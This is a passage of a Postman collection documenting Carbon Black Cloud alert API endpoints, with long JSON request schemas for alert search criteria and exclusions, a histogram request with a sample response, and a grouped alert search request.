\"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": &lt;boolean&gt;,\n    \"mdr_threat_notes_present\": &lt;boolean&gt;\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"LOW\",\n      \"HIGH\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"LOW\",\n      \"LOW\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"TRIAGE_COMPLETE\",\n      \"IN_PROGRESS\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\":     \"mdr_threat_notes_present\": &lt;boolean&gt;\n  },\n  \"field\": \"&lt;string&gt;\",\n  \"min_count\": 0\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","_histogram"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4b6bfbc0-25a7-412e-a1eb-9170cff83291","name":"Get Alert Histogram","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"bucket_size\": \"+5DAY\",\n  \"field\": \"LAST_EVENT_TIMESTAMP\",\n  \"min_count\": 0\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/v7/orgs/{{cb_org_key}}/alerts/_histogram"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json"}],"cookie":[],"responseTime":null,"body":"{\n    \"start\": \"2023-04-03T00:00:00.000Z\",\n    \"end\": \"2023-04-18T00:00:00.000Z\",\n    \"results\": [\n        {\n            \"step_start\": \"2023-04-03T00:00:00.000Z\",\n            \"total\": 470\n        },\n        {\n            \"step_start\": \"2023-04-08T00:00:00.000Z\",\n            \"total\": 671\n        },\n        {\n            \"step_start\": \"2023-04-13T00:00:00.000Z\",\n            \"total\": 612\n        },\n        {\n            \"step_start\": \"2023-04-18T00:00:00.000Z\",\n            \"total\": 10\n        }\n    ]\n}"}],"_postman_id":"81f643b4-5fc4-4e8e-8990-b96876d6adf8"}],"id":"57be830f-b6d0-4446-877d-22ca8ed9765e","_postman_id":"57be830f-b6d0-4446-877d-22ca8ed9765e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Search Alerts - Grouped by Threat Id","item":[{"name":"Find Alerts - Grouped","id":"0c7c42e7-bc6e-4680-ab92-881ff4477488","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"time_range\": {\n        \"range\": \"-10d\"\n    },\n    \"criteria\": {\n        \"type\": [\n            \"WATCHLIST\"\n        ],\n        \"minimum_severity\": \"1\"\n    },\n    \"sort\": [\n        {\n            \"field\": \"count\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_search","description":"<p>Search for Alerts and group the results by Threat Id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"group_by\": {\n    \"field\": \"&lt;string&gt;\"\n  },\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"ADWARE\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    